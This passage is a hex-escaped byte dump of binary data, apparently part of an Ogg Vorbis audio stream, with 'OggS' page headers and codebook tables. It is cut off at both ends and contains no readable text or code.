x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x80\x01\x07\x00\x80\x00\x13\xCA\x40\xA1\x21\x2B\x01\x80\x28\x00\x00\x87\xA2\x58\x16\x70\x1C\xCB\x02\x8E\x63\x59\x40\x92\x2C\x0B\x60\x59\x00\xCD\x03\x68\x1A\x40\x14\x01\x80\x00\x00\x80\x02\x07\x00\x80\x00\x1B\x34\x25\x16\x07\x28\x34\x64\x25\x00\x10\x05\x00\xE0\x50\x14\xCB\xD2\x34\x51\xE4\x38\x9A\xA6\x69\xA2\xC8\x71\x34\x4D\xD3\x44\x91\x65\x69\x9A\xE7\x99\x26\x34\xCD\xF3\x4C\x13\x9E\xE7\x79\xA6\x09\xCF\xF3\x3C\xD3\x84\x69\x8A\xA2\xAA\x02\x51\x54\x55\x01\x00\x00\x05\x0E\x00\x00\x01\x36\x68\x4A\x2C\x0E\x50\x68\xC8\x4A\x00\x20\x24\x00\xC0\xE1\x38\x96\xE5\x79\x9E\x27\x8A\xA6\x68\x9A\xAA\xCA\x71\x34\xCD\xF3\x44\x51\x14\x4D\x53\x55\x55\x95\xE3\x58\x96\xE7\x89\xA2\x28\x9A\xA6\xAA\xBA\x2E\xCB\xD2\x34\xCF\x13\x45\x51\x34\x4D\x55\x75\x5D\x68\x9A\xE7\x89\xA2\x28\x9A\xA6\xAA\xBA\x2E\x3C\xCF\xF3\x44\xD1\x14\x4D\x55\x55\x5D\x17\x9E\xE7\x79\xA2\x68\x9A\xAA\xA9\xAA\xAE\x0B\x51\x14\x45\xD3\x34\x4D\x55\x55\x55\xD7\x05\xA2\x68\x9A\xA6\xA9\xAA\xAE\xEA\xBA\xC0\xF3\x44\xD1\x34\x55\xD5\x75\x5D\x17\x78\x9E\x28\x9A\xA6\xAA\xBA\xAE\xEB\x02\x51\x34\x4D\xD5\x54\x55\xD7\x75\x5D\x80\x69\x9A\xA6\xAA\xBA\xAE\xEC\x02\x54\x55\x55\x55\xD7\x75\x65\x17\xA0\xAA\xAA\xAA\xAA\xAE\x2B\xCB\x00\x55\x75\x5D\xD7\x75\x5D\x59\x06\xA0\xAA\xAE\xEB\xBA\xB2\x2C\x00\x00\xE0\xC0\x01\x00\x20\xC0\x08\x3A\xC9\xA8\xB2\x08\x1B\x4D\xB8\xF0\x00\x14\x1A\xB2\x22\x00\x88\x02\x00\x00\x8C\x51\x4A\x31\xA5\x0C\x63\x12\x42\x09\x21\x62\x4C\x42\x28\x21\x54\x52\x4A\x29\xA9\x94\x0A\x42\x29\xA5\x94\x50\x41\x28\xA1\xA4\x10\x32\x29\x29\xA5\x54\x4A\x05\xA1\x84\x50\x4A\xA8\x20\x94\x52\x4A\x29\x05\x00\x80\x1D\x38\x00\x80\x1D\x58\x08\x85\x86\xAC\x04\x00\xF2\x00\x00\x08\x63\x94\x62\xCC\x39\xE7\x24\x42\x4A\x31\xE6\x9C\x73\x12\x21\xA5\x18\x73\xCE\x39\xA9\x14\x63\xCE\x39\xE7\x9C\x94\x92\x31\xE7\x9C\x73\x4E\x4A\xC9\x98\x73\xCE\x39\x27\xA5\x64\xCC\x39\xE7\x9C\x93\x52\x3A\xE7\x9C\x73\xCE\x49\x29\xA5\x74\xCE\x39\xE7\xA4\x94\x52\x42\xE8\x9C\x83\x52\x4A\x29\x9D\x73\xCE\x39\x01\x00\x40\x05\x0E\x00\x00\x01\x36\x8A\x6C\x4E\x30\x12\x54\x68\xC8\x4A\x00\x20\x15\x00\xC0\xE0\x38\x96\xE5\x79\x9E\x27\x8A\xA6\x69\x49\x92\xA6\x79\x9E\x28\x9A\xA6\xAA\x6A\x92\xA4\x69\x9E\x27\x8A\xA6\xA9\xAA\x3C\xCF\xF3\x44\x51\x14\x4D\x53\x55\x79\x9E\xE7\x89\xA2\x28\x9A\xA6\xAA\x72\x5D\x51\x14\x45\xD3\x34\x4D\x55\xE5\xBA\xA2\x27\x8A\xA6\xA9\xAA\xAE\x0A\xD1\x14\x45\xD3\x54\x55\xD7\x85\x69\x8A\xA2\x69\xAA\xAA\xEB\x42\x96\x4D\xD3\x54\x5D\xD7\x75\x61\xDB\xA6\xA9\xAA\xAA\xEA\xBA\x40\x75\x55\xD5\x75\x5D\x19\xB8\xAE\xAA\xBA\xAE\x2C\x0B\x00\x00\x4F\x70\x00\x00\x2A\xB0\x61\x75\x84\x93\xA2\xB1\xC0\x42\x43\x56\x02\x00\x19\x00\x00\x84\x31\x08\x29\x84\x10\x52\x06\x21\xA4\x10\x42\x48\x29\x85\x90\x00\x00\x80\x01\x07\x00\x80\x00\x13\xCA\x40\xA1\x21\x2B\x01\x80\x54\x00\x00\x80\x10\x29\xA5\x94\x52\x4A\x29\x11\x63\x52\x4A\x29\xA5\x94\x52\x22\xE6\xA4\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\x21\x84\x50\x00\x20\x76\x85\x03\xC0\x4E\x84\x0D\xAB\x23\x9C\x14\x8D\x05\x16\x1A\xB2\x12\x00\x08\x07\x00\x00\x8C\x41\x8A\x31\x08\x29\xB5\xD6\x62\x85\x90\x62\xCE\x49\x49\x29\xC6\x18\x2B\x84\x18\x73\x8E\x4A\x4A\x2D\xB6\x18\x34\xE6\x1C\x84\x94\x5A\x6B\x31\xD7\xA0\x31\xE7\x20\xA4\xD2\x5A\x8C\x35\x06\xD5\x42\x28\xA5\xB5\x18\x6B\xAD\x35\xB8\x14\x3A\x2A\xA9\xC5\x18\x6B\xAD\x41\x08\x95\x52\x8A\x31\xC6\x1A\x73\x0D\x42\xA8\x92\x42\x6C\xB1\xE6\x9A\x6B\x10\xC2\xD6\xD4\x5A\xAC\xB5\xE7\x9C\x83\x10\x3A\xB7\x14\x53\x8C\x31\xF7\x1A\x84\x10\x42\xC6\x1A\x6B\xCD\xB9\xE7\x20\x84\x10\xB6\xD6\x56\x5B\xAF\xB9\x06\x21\x84\xF0\x41\xD6\x9A\x73\x0E\x3A\x08\x21\x84\x0F\xB2\xD6\x9A\x83\xCE\x05\x00\x98\x3C\x38\x00\x40\x25\xD8\x38\xC3\x4A\xD2\x59\xE1\x68\x70\xA1\x21\x2B\x01\x80\xDC\x00\x00\x04\x21\xA5\x18\x73\xCE\x39\x07\x21\x84\x10\x42\x08\x29\x42\x8C\x31\xE6\x9C\x73\x10\x42\x08\x21\x84\x52\x52\x84\x18\x63\xCC\x39\xE7\x20\x84\x10\x42\x08\x21\xA4\x8C\x31\xE6\x9C\x73\x10\x42\x08\xA1\x94\x52\x4A\x49\x29\x65\xCC\x39\xE7\x20\x84\x10\x42\x29\xA5\x94\x92\x52\xEA\x9C\x73\x10\x42\x08\xA1\x94\x52\x4A\x29\x25\xA5\xD4\x39\xE7\x20\x84\x10\x42\x09\xA5\x94\x52\x4A\x4A\xA9\x73\x0E\x42\x08\x21\x84\x52\x4A\x29\xA5\x94\x94\x52\x4A\x9D\x83\x10\x42\x28\xA5\x94\x52\x4A\x29\x29\xA5\x94\x42\x08\x21\x94\x52\x4A\x29\xA5\x94\x52\x52\x4A\x29\x85\x10\x42\x28\xA5\x94\x52\x4A\x29\xA5\xA4\x94\x52\x0A\x21\x84\x52\x4A\x29\xA5\x94\x52\x4A\x49\x29\xA5\x94\x52\x08\xA1\x94\x52\x4A\x29\xA5\x94\x92\x52\x4A\x29\xA5\x52\x4A\x29\xA5\x94\x52\x4A\x29\x25\xA5\x94\x52\x4A\xA5\x84\x52\x4A\x29\xA5\x94\x52\x4A\x4A\x29\xA5\x94\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x94\x52\x4A\x29\xA5\x54\x4A\x29\xA5\x94\x52\x4A\x29\x29\xA5\x94\x52\x4A\xA9\x94\x52\x4A\x29\xA5\x94\x52\x52\x4A\x29\xA5\x96\x52\x29\xA5\x94\x52\x4A\x29\xA5\xB4\xD4\x5A\x4A\x29\xA5\x52\x4A\x29\xA5\x94\x52\x4A\x49\x29\xA5\x94\x52\x4A\x29\x95\x52\x4A\x29\xA5\x94\x52\x00\x00\xD0\x81\x03\x00\x40\x80\x11\x95\x16\x62\xA7\x19\x57\x1E\x81\x23\x0A\x19\x26\xA0\x42\x43\x56\x02\x00\x64\x00\x00\x08\xA2\x14\x53\x4A\xAD\x45\x82\x2A\xC9\x9C\xC4\x5E\x42\x25\x15\x73\x90\x5A\x8A\x28\x93\x4E\x5A\x0E\xAE\x43\xD0\x20\xE6\xA4\x95\x8A\x39\x84\x94\x93\x54\x3A\x07\x95\x52\x0C\x4A\x2A\x21\x75\x4C\x29\x06\x29\x96\x1C\x42\xC6\x98\x93\x9C\x82\x4A\xA1\x63\x0E\x00\x00\x00\x41\x00\x00\x81\x90\x09\x04\x0A\xA0\xC0\x40\x06\x00\x1C\x20\x24\x48\x01\x00\x85\x05\x86\x0E\x11\x22\x40\x8C\x02\x03\xE3\xE2\xD2\x06\x00\x20\x08\x91\x19\x22\x11\xB1\x18\x24\x26\x54\x03\x45\xC5\x74\x00\xB0\xB8\xC0\x90\x0F\x00\x19\x1A\x1B\x69\x17\x17\xD0\x65\x80\x0B\xBA\xB8\xEB\x40\x08\x41\x08\x42\x10\x8B\x03\x28\x20\x01\x07\x27\xDC\xF0\xC4\x1B\x9E\x70\x83\x13\x74\x8A\x4A\x1D\x08\x00\x00\x00\x00\xC0\x03\x00\x3C\x00\x00\x24\x1B\x40\x44\x44\x34\x73\x1C\x1D\x1E\x1F\x20\x21\x22\x23\x24\x25\x4F\x67\x67\x53\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x55\x0B\x00\x00\x02\x00\x00\x00\xAE\x93\x37\x92\x01\x3C\x26\x27\x28\x02\x00\x00\x00\x00\x80\x07\x00\x1F\x00\x00\x49\x0A\x10\x11\x11\xCD\x1C\x47\x87\xC7\x07\x48\x88\xC8\x08\x49\x89\xC9\x09\x4A\x00\x00\x20\x80\x00\x00\x00\x00\x00\x08\x20\x00\x01\x01\x01\x00\x00\x00\x00\x80\x00\x00\x00\x00\x01\x01\x4F\x67\x67\x53\x00\x00\xC0\x2C\x00\x00\x00\x00\x00\x00\x55\x0B\x00\x00\x03\x00\x00\x00\xAB\x0F\x1C\x9B\x1D\x53\x4E\xFF\x3F\xFF\x26\xFF\x37\xFF\x63\xFF\x3F\xFF\x32\xFF\x4E\x49\x53\x57\x52\xFF\x6F\xFF\x47\xFF\x40\xFF\x53\xFF\xE4\x82\xB5\x62\xCE\xC7\xAC\x76\xA3\x78\x8A\xCD\x9B\xC9\x9B\x5A\x21\x6A\xF0\x3C\x5C\x71\x10\x72\x34\x7D\x95\xF8\xF6\xF3\x23\x00\x70\xB3\x75\xF3\x6E\xFF\x7F\x46\xFE\xAF\xE6\x92\xDB\xFC\xFE\x8B\xA3\x17\x0B\xD6\xBF\xBE\x9E\x8F\xBF\x7F\xC5\x2F\xDF\xB6\x88\xEF\xCE\x4D\xD4\x66\xF0\xD6\x2F\xA7\xD4\x39\xB3\x15\xC8\xEA\xF6\x87\xEA\x23\x00\xD4\x8A\x05\x36\x66\x92\xD4\x26\xE0\xAC\x98\x62\x63\x3F\x56\x35\xAB\x7B\xD9\xC7\x77\xD2\xCA\x35\x7D\xC1\x75\xF3\x47\x00\xB0\xF2\x72\xFD\x69\x59\x66\xF6\x57\xD5\x4E\x8C\xE3\xFC\xCB\x9B\x7F\x6D\x1F\xE1\x53\xFD\xEB\x3A\xBC\x7E\xEA\xD4\xEF\xCE\xE1\x3A\x42\x3A\xF7\x9B\x52\xE8\x33\x25\x89\xEA\x92\x9A\xAF\x3F\x29\x00\x5A\xCA\xB5\x41\x0A\xD9\x7F\x06\x28\x1B\x89\x82\xA1\x5A\x1B\xF8\xC0\x7F\x0E\x98\x48\xD6\xFD\x8A\xEC\x97\x3D\xDF\xB3\xBC\x70\x70\xF1\xCE\x1E\x39\x03\x00\x38\xF6\x71\xCC\x39\x46\x50\x65\x98\x9A\x0E\x00\x00\x00\x00\xC0\x5D\x7F\x85\x37\xE5\xD6\xB7\x4F\xF6\xD7\x9B\x68\x45\x00\x08\x9D\x79\xE6\x7D\xA7\xCD\xB8\x6B\x80\xD3\x18\x82\xB3\x08\x77\xF2\x6D\xDF\xF6\xF1\x3B\xD3\x1C\x90\xB2\x8E\x81\xEC\x30\xE1\x76\x57\x3F\xF2\x04\x73\x70\xDD\xA1\x7E\xEE\x2E\x62\xDC\xB7\x75\xF2\xDD\x13\x16\xD5\xA7\xB3\xF7\x59\xD0\x93\xDE\xCE\x7C\x70\xA3\x46\xFA\x66\x10\x1A\x51\xD9\x44\xC7\x09\x6C\x51\x45\xD7\xF3\xF1\xFB\x66\x56\x33\x7B\xB7\x52\xB1\xB4\x93\xC4\xD4\xB9\x26\xBB\x68\x37\x99\xEB\x69\x3E\x73\x99\x39\xD9\xCE\x7A\xDB\x2F\xDF\x47\x26\x4A\x2F\xCB\x0D\x33\x8A\x7C\x08\x97\x8C\xC7\x87\x51\x30\x0D\xA8\xFE\x01\x24\xBC\x5E\x57\x83\xE9\x36\x47\x12\x79\xC0\xD4\x74\xD6\x1F\xB5\xAF\x61\x37\xDA\x87\xA9\x6A\xF4\x34\x2F\x3E\xA4\xCC\xD1\xD2\x09\x11\x4C\xB2\x1B\x95\xD0\xEF\x50\x8D\x09\x51\xCC\x30\xEB\xA9\x7B\x27\xAB\x9A\x1B\x50\x36\xA3\xE9\x69\x55\x67\xF7\x61\x4F\xEF\x38\xEB\x9C\xE1\xF6\xF2\x9C\xAC\x12\xD5\x4C\xA2\x11\xD8\x0A\x6D\x64\xEF\x45\xD5\x47\x27\xFF\x17\xE3\x26\x36\xF1\xD5\xB4\xF2\x33\xB2\xDF\x0B\xC6\xAE\x89\x03\x2B\x20\x68\x19\x63\xDB\x5D\x5B\xD6\xF7\x87\x7A\x92\x05\xE1\xD3\x7F\xB6\x00\xDE\xBB\xA5\x32\x47\xA6\x7F\x8D\x8E\x76\x90\x28\xF4\xCB\xC5\xB2\xC5\xF9\xD7\x80\x1B\x89\xE2\xD6\x4D\x1A\x38\x0B\x28\xCC\xB9\xB5\x36\xAA\xAA\x94\x4E\x60\x00\x00\x00\x00\x80\xD7\x9D\xE3\xFB\x8F\xE3\xD3\xCD\x87\xF3\x41\xCD\xD2\xE7\x73\x73\x7C\x6B\x36\x18\x93\x83\x9B\xD6\xEE\xCB\x14\x37\x8F\x93\xDA\x21\x16\x83\xC6\x3A\xD2\xA5\x43\x2C\x46\xC6\xFC\x6F\xC4\xF2\x79\xCE\x20\x5D\x1E\x45\x2F\xDB\xF5\xE1\x86\x45\x27\x47\x9D\x78\xBF\xE2\x4B\xA3\xF9\x97\xDD\x62\x4E\x92\x9D\x93\xF3\xB3\xE5\x66\x7E\x77\x2A\x59\x66\x0D\xBA\xFC\x78\xCF\xF5\x64\x43\xDE\xBD\xAE\xC4\xAE\x12\xC2\xEB\x24\xD3\xDE\xEE\xDC\x77\xD6\x4B\x15\x45\xF7\x1C\x99\xBF\xB3\x43\x2A\xAE\xC7\xB8\xBD\x77\x55\xBF\x94\xE5\x72\xF3\x6B\x44\x64\xCF\x63\xE3\x24\xDB\x7F\xB9\x64\x51\x6A\x47\x72\x1B\xD7\x86\x5D\xDA\x4C\xB2\x9E\xFB\x21\x07\xCF\x74\x55\xEF\x5C\xA2\xD0\x61\xB1\x80\xD9\x67\x02\xA2\x9A\x47\x50\xEA\x49\xA6\x60\x4A\x37\xAF\xDD\x35\x55\xA3\xAC\x53\x44\xEC\xC1\xFD\x6A\x98\xE6\xE9\x69\x21\x12\x01\xA4\xCF\x14\x73\xAE\x06\x37\x02\xAE\xB7\x6A\xEA\x3E\xB0\x52\x32\xC6\x06\xD9\x7E\xA9\x99\x2F\xF8\xEB\x35\x76\x63\x7D\x8C\x94\x17\x6A\x7F\x94\x7E\x84\xD9\x23\x3D\xA6\xF8\xFB\xC9\xDB\xA4\xAF\x2C\x49\xE1\x3B\xA1\x10\x80\x02\x5E\x8B\x25\x69\x8D\xE0\xBF\x21\x21\x0C\x24\x0A\xDE\x5E\xA1\xCC\xC1\xFE\xE7\x80\x49\x39\x09\xFE\x22\x20\x2F\x97\xB5\xE3\xD8\xE7\xA8\x39\x2A\x28\x69\x3A\x74\x00\x00\x00\x00\x00\x64\x56\x6A\x55\xD5\x11\xB7\xB2\xBE\x75\x36\x26\xD6\x46\x9B\x7D\xD9\xFC\x6F\x5E\xD4\x7E\xD2\xC6\x4B\x72\x7A\xB0\xCE\x87\x3F\xBA\xF2\x81\xBF\xAC\x94\x9C\xD2\xFF\x90\xDE\x2F\x83\xFE\x3F\x3F\xCA\xCE\x07\x37\x29\x0B\x43\x5B\x25\xA6\xC3\x3D\xC7\xDE\x99\x4C\xEB\x69\xDB\x35\xE1\x9A\x5C\xEF\xF9\x8D\x9E\x6A\x22\x51\x4D\x77\xB4\x8A\xDC\x61\x21\x24\xDD\x55\x1E\xA2\x7D\x0C\x3F\xB1\xAF\x23\x96\x12\x49\x65\x27\xF5\x3C\x53\xF7\xCB\x6C\x71\xA2\xE2\x51\xFF\xE2\x55\x8D\xD1\xC3\x77\x1E\x35\xF7\x4B\x9B\xFF\x96\x30\x97\x77\x3E\xF7\xF8\xCC\x57\x34\xF3\xEE\x0C\xF3\x5E\x61\xED\xC3\xD3\x96\xE3\xD3\xAA\x98\x92\x72\xFE\x4F\x79\xE4\xCB\x21\x73\x6C\xCE\x50\xEF\x2F\xF2\x1C\x35\xFB\x55\x65\x1E\xBF\xB9\x84\x77\xE2\x24\x45\x29\xF4\x47\xC0\x5D\x49\xEF\x35\xAB\x87\x7E\xAE\x5F\xA6\x9F\x62\x3A\x1B\x38\x9D\x99\xCC\x0A\xD9\xDA\xF8\xFD\xAD\xC3\x9E\x4F\x5D\xA0\x93\x64\xEA\x9C\xCC\x97\xEA\x6E\xA6\x70\x0B\x8A\xFC\xEF\xFD\xCA\x58\x38\x40\x96\xBE\x5A\x8C\x26\x7E\xE9\xE1\x70\xA9\xEC\xCF\xE8\xD4\xBE\xAB\x48\xA6\xB0\xBE\x66\xF8\x4B\x7B\x79\x77\x2F\x5F\xA6\x98\x37\xE5\xF0\x0F\xBA\x2D\xAA\x02\x00\x3E\x7A\xB5\x14\x17\x21\xFE\x3B\x23\x12\xA6\xB2\x64\xDD\xD2\xAB\x05\x7C\xF0\xFF\x2C\x20\x21\xFF\xF2\xD3\xE8\xBD\x66\x62\x42\xDF\x32\x97\xA7\xF9\x71\xA7\x80\x91\xE9\x92\xD1\xC0\x19\x78\xCD\xE3\x02\x5E\xF7\x0B\x20\x40\xDB\xB6\x80\xA7\x1E\xFB\xF9\x04\x00\x00\x00\x00\x00\xF0\x49\xF3\x2A\xF5\xC9\xD8\xFB\x8B\xDD\xD1\xB8\xD9\x69\xD3\xD5\x7E\xAC\xE1\x25\x5E\xA9\xDF\xC8\x09\xF7\xFE\x31\x37\x45\x26\x34\xA7\x3D\xAF\x23\x7C\x13\x29\xBE\xAF\xA7\x08\xB9\x0D\xB8\x21\x94\x74\x97\x50\x47\xDB\x57\xA5\xAE\xA7\xD0\x11\x72\x3B\x4F\x2F\x1D\xF7\x2F\x97\xA5\x0B\x21\x77\x81\xBC\xB7\x57\xD3\xFD\x46\x43\xAF\x15\xD4\x94\x46\x1D\xF7\x99\x65\x66\xC6\xCD\xD3\xD7\x8F\x70\xD8\x59\xCF\x9C\xFC\xAF\x3E\x8F\x7A\x9C\x6C\xD5\x84\x5D\x92\xFC\x22\x7E\x32\xE7\x9A\xFB\x5D\xBE\xC6\x48\xED\x3F\x0D\x1A\x66\xAA\x4A\xCA\xFC\xE7\xA5\xCE\x17\x41\xC4\x59\xD5\xD4\x1D\xD9\x66\x7C\x76\xD5\x21\x89\x64\xEB\xC2\xDB\x0F\x88\xAE\xB9\xCE\x37\x1F\x96\xE6\x19\xD7\x32\xCF\xDE\x4F\xF7\xC9\x3D\x97\xBA\x3C\x5E\x3A\x59\x34\x6E\x56\x57\x0F\x53\x74\xA2\x9B\x19\x5A\x5E\xF8\x06\x8F\xEE\x08\x27\x96\xE8\x6B\x5A\xD5\x3D\x41\x05\x9D\x08\x01\x9A\xEA\xA9\xAB\xEA\xF8\x8A\x7B\x38\xD8\x5D\xA8\xC7\x75\x9B\x49\x0F\x54\xC4\xAE\xDF\x3E\xF2\x79\xA3\xD9\xD8\x93\xED\x52\x81\x9B\x32\x99\x3E\x8A\xEF\x7E\x24\xF4\x64\x83\x11\x00\x0A\x6A\xA2\xA2\xCF\xA8\x28\xAA\x00\xAA\xC8\xA3\x82\x88\x29\xAA\x8A\x20\x28\x22\x3F\x2F\x72\x20\x49\x92\x2C\xAC\xBF\x58\x7F\xD7\xAD\xE1\xB7\x15\x48\xC2\x00\x5E\x8B\x85\xC0\x05\xFE\x1B\x26\x6C\x24\xC1\xEF\x6E\x01\x4E\x19\xE6\xBF\x82\x92\x06\x92\xE0\xD7\x59\x92\xB8\x10\xB0\xCF\x63\xCC\xA5\xAA\x2A\x1C\x0E\x1F\x00\x00\x00\x00\x00\xEC\xCF\xEA\xA3\x9D\x1E\x85\xC4\xA8\xD9\x4E\xB9\x55\x99\x58\xA9\xBE\xAB\x76\x98\x79\xF5\xA6\x1A\x32\x19\x57\xD9\xD6\x57\xCB\xED\x53\x2E\x3E\x4D\xF7\x0A\x73\xAE\x91\xD7\x37\x1B\x28\xE9\xC4\xA7\x56\xFB\x31\x89\x2C\xBA\xBE\xF3\x5B\xCE\x96\x58\xB8\x2E\x2D\x5D\xE4\xDD\xB0\x38\xDE\x7C\x03\xF0\x5A\x8F\xEA\xF3\xD3\xE9\x2C\x5C\x0E\x78\x9C\xED\xBC\x7F\xE2\x9B\x58\x45\xEA\x3C\xA7\xEA\xE1\xF2\x4D\x1F\xE8\xC7\x92\x5B\xDB\xE1\xE3\xA9\xF3\xD6\x90\x4C\x7C\x73\x90\x9F\xEE\x54\x70\xDB\xBB\x4C\x2E\xCC\xF3\xAF\x75\xAF\xEA\xB6\xC9\xCC\xAA\xAC\x5A\x1E\xFF\x9F\x9D\xA9\x38\x24\xDE\x56\x9D\x49\xD7\x9D\xA2\x1A\xD5\x30\xBE\xFF\x12\x3F\x58\xBE\xEF\x9F\xAB\x59\x94\x11\x10\x4C\xAD\xB1\xF3\x5A\x88\x4B\xC4\xED\x06\x6A\x1C\xE7\x12\x06\xB5\xC2\x34\x2C\x5E\xCF\x4C\xE5\x66\x3E\x64\x26\xE5\x94\x28\x6C\xA7\x66\x9D\x9A\x31\x8C\x60\xCF\x79\x89\xFB\x8B\x6C\xA8\x6E\x31\x2D\x2F\x94\xA7\x33\x27\x9B\x21\x6D\xAE\x33\xF9\xEC\xEB\xD8\x08\x21\x21\x7C\x96\xDA\xC5\xB7\x9D\x8A\x51\x6F\xCC\xD5\x7E\x53\xB9\xEA\xD9\x77\x7C\x7B\xCF\x13\xD1\xB7\xC8\x77\x8F\x14\x43\x45\x9F\x85\x7B\xAA\xA8\x21\xFA\xA4\xCF\xE6\x0D\xF3\xB2\xE8\x4D\x13\x41\x00\xFE\xCB\x95\xC2\x45\xCD\xBF\x06\xB1\xFD\x32\x24\x8A\x1C\xCC\x65\x3A\x05\xF9\x9F\x01\x1C\x24\x8A\xAD\xF5\xBE\x6F\xC2\xB1\xCF\xAD\xF6\x59\xAD\xB2\xD1\xC9\x00\x00\x00\x00\x00\x69\x25\x8D\x17\x57\x5F\x87\xAF\x65\x6B\x46\x39\xE4\xDC\xAF\x72\xA7\x6B\x27\x21\x75\xD3\xF2\x96\x07\x13\xBD\xBB\x1D\xCE\xE7\xA1\xF1\x8A\x1F\xD9\x8E\x3D\xAF\x18\x8F\xA7\xC5\xE9\xCD\x39\x71\xBA\x96\x35\x07\x3B\x3D\x6F\xB9\xBB\x5E\x2C\x4E\x13\x71\xEE\x9D\x77\x93\xFE\xD7\x7B\x73\x42\xF4\xAF\x1A\x7E\x30\x13\x27\xF3\xFF\x88\x4B\xEA\xF1\x96\xF0\x39\x59\x05\xB7\xB6\xC9\x7D\xFE\xF1\x9C\x33\x6A\x82\xE6\xE4\x27\x34\x59\x49\x81\x2C\x98\xFD\x12\xA1\xDD\xD5\x79\xCC\x2E\x6B\x2A\x2B\x76\x1C\x23\x85\x50\x2F\xD9\xF4\xDD\xA7\x5F\xAD\x8D\x3A\xA2\xF8\xDA\x23\x58\x6B\x2E\x7C\xB8\xCA\xFB\xA5\x4D\xBA\x86\x6B\x77\x7D\xEC\xAF\x4F\xB3\x87\x83\x73\x38\xBD\x94\xAF\xD5\xB9\xF9\xB6\x71\xDD\x1B\x28\x60\xDC\x67\x47\xCC\xED\xC1\x24\x64\xAF\xD1\xCE\xC3\x94\x00\x6A\x1E\x3A\xA7\xA8\xD6\x7C\xCD\xE6\x70\x32\x67\x09\xFE\xFD\x52\xE7\x4E\xB5\xC8\xE2\x64\x51\x71\x4F\x56\xE2\x5D\xF3\xE2\x56\x77\xDB\x68\xB4\x0C\x32\x17\x91\x16\xB3\x75\x5F\xF4\xDE\x00\x1A\x2F\x77\xA6\xD3\x9F\x9F\x52\xEC\x25\xA3\xD3\x23\xE3\x0B\xD6\x8D\x64\xC2\x50\xA1\x43\x85\xA1\xDE\x84\x1C\x18\xD9\x16\x38\x00\x36\x9A\x0D\x40\x0E\xE6\x3F\x03\x92\x1B\xC9\xFA\x3A\xB5\x45\x44\x0D\xE6\x3F\x07\xC2\x44\xAA\xFD\x67\x1D\x79\xD1\xFA\x63\x4D\x62\x76\xF3\xF2\xD1\x38\x1C\x67\x77\x5B\x37\x4F\x9E\x71\x61\xCC\xC7\xCE\x8C\x58\xCE\xE7\x43\xC2\xDE\xB6\x59\xA3\xE5\xCA\x34\x3D\x17\x00\x00\x00\x00\x00\xA6\x0D\x6E\x36\xFA\xCF\xAC\x72\x63\x0F\xBA\xDB\xCE\x33\xB5\x5A\xCE\x3F\x99\x57\x7B\xA8\xBB\x38\x5F\x3A\xBC\x69\x9A\x93\x63\xEB\x6F\x59\x7C\x57\xBE\xF6\xAE\x97\xF6\xD7\xBF\x27\x1D\x79\x3C\x8C\xD2\x67\xD6\xF3\x35\xB8\xE0\xFE\xF1\x7A\xF1\xF5\xEA\x73\xEE\xF5\xFB\xD1\xEE\x5C\xE2\x93\xC7\x5D\x45\x9D\x5D\xD7\x8A\xB2\x81\xDD\x9B\x86\xDA\x4B\xD5\xD6\x00\xB5\x09\x8F\x2B\x4E\x7B\x20\x4B\x78\xAD\x35\xB9\xD5\xD3\xD5\xE7\x4B\x9B\x9E\xF3\x25\xAE\x47\xEA\xA8\xE0\xB1\xDF\x8F\x1A\x6D\x92\x8F\xB0\x3E\xFF\xC1\x8C\xE3\x6F\xA2\x08\x0A\x1F\xFC\x55\x1E\x0D\x5F\xD9\xAA\x8B\xCA\xCA\xCA\x4E\x9A\x66\xF3\x4B\x24\xE7\x26\x14\x63\x0D\x87\x81\xE7\x57\x7D\x55\xCF\x9D\x99\xD5\xF1\x35\x69\x2A\xEB\xF5\x7D\x4E\x36\x5D\x59\x2A\x86\x1A\xB6\x6A\x5D\x5B\xF0\x9A\x6C\x5B\xE7\xA3\xAA\xBD\x1C\x9F\x54\x0D\x1B\x20\xAD\x86\xDD\xEB\x7D\x9E\x2C\x24\xAA\x18\xB5\xC0\xE4\x93\xB9\xC9\x65\x22\x90\x29\x73\x4B\x8D\xBE\x2D\xA6\x23\x8B\x9D\xF0\xA6\xA4\xA6\x7D\x57\xA7\x7D\xBC\x5B\x08\x0B\x02\x6C\x49\x36\x72\xE8\x40\x86\x77\xCB\x7F\x0D\xFF\x2E\xBF\xCB\xB6\x90\x02\x51\x53\x0F\x15\xE3\xC9\x50\x41\x15\xB4\x72\x4B\x36\xE2\xA1\x46\xC7\x46\xBD\xB5\xDA\x94\x33\xA8\xED\x60\xF8\x01\xCC\x24\x20\x00\xB8\xDB\x07\x98\xED\xEF\xDB\x22\x81\xC3\xFE\xF2\xFC\xBA\x14\xFB\x1D\xCF\x06\xD7\xE3\xB8\xFC\x3D\x6F\xD0\xDE\xD0\x61\xFE\x1C\xAF\xB9\x72\xE3\xED\xC2\xA2\xB8\xF6\x6E\x5E\x1A\xF8\xF0\xB5\x61\xFC\xD1\x06\xDC\x8A\x05\x35\xE6\xA5\x26\x07\xA9\xE2\x52\x8E\xFF\x84\xBA\x6E\xFE\x00\xDB\x2C\xC8\xEC\x89\x01\xC0\x83\x25\xC0\xF4\xA5\xD3\x70\xFC\xDF\x9C\xB9\xEB\x85\x25\xCA\x3D\xF1\xE1\x8A\x6E\xEB\xEB\x2F\xFC\x64\x53\xC6\x7A\x36\xE5\x9B\xE7\xBD\xE9\x9C\x67\xF2\xF2\xB8\x79\x79\x70\x72\xEF\x75\xAE\x07\x69\x89\x6E\x7F\xF9\x51\xE5\xA4\xDF\x02\x00\xAC\x5E\x23\xBF\x41\xCE\xDD\x99\xDA\x8D\x3C\x9D\x87\xFA\xD6\xB1\x7D\xD7\xA7\x75\xDB\xAC\xE5\x04\xE9\xB0\x1